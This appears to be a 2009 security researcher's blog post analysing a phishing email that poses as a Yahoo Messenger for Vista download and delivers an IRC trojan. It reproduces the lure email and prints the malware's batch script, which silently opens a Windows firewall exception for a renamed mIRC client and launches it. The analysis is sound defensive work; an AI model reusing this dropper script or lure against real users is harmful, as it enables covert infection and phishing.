Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 24 April 2009

Email Alert: IRC Trojan disguised as Yahoo Messenger Beta 9.4

I received the following e-mail a few minutes ago;

Yahoo! Messenger <>

Preview the new
Yahoo! Messenger for Vista™

The new messenger Vista 9.3 now works on Windows XP too. Download Now <>

Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <>

We need your help to improve the product.
» Send feedback <>
See Yahoo! Messenger for Vista in action.
» Watch the video preview

Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).

See what's in store...

* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling

©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.

Copyright © 2008 Yahoo! Inc. <*> All rights reserved. Privacy Policy <*> - Terms of Service <*> - Copyright/IP Policy <> - Help <*>

The link it points to for the download;


.. leads to an IP in China. If we scan the file with VirusTotal, we see it's an IRC trojan.

Extracting the file, shows it claiming to be a .DLL by the name of fp721ext.dll. This DLL however, is actually a folder, and contains the files shown in the following screenshot;

As you can see, there are quite a few in there. mIRC itself, a legit IRC client, has been renamed mircrosoft.exe. The folder also contains a file called csc.cmd. Amongst other things, this adds an exception to the Windows firewall, to allow mircrosoft.exe to connect without warning you, to the attackers IRC channel;

@echo off

@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg

@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"

@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE

@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe


regis.reg contains the following;










anyssya.jpg actually is a JPG file, and it's detection at VT is non-existent. However, since it's also loaded by the csc.cmd file, I'm betting it's a little more than it seems.

The infection, judging by the .ini files, seems to connect to (

I'll post further analysis once complete. In the meantime, the e-mail itself originated from (Velcom (ADSL) NET-VELCOM-DSL-1) and had the following properties;

From: Yahoo! Vista [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !

No comments: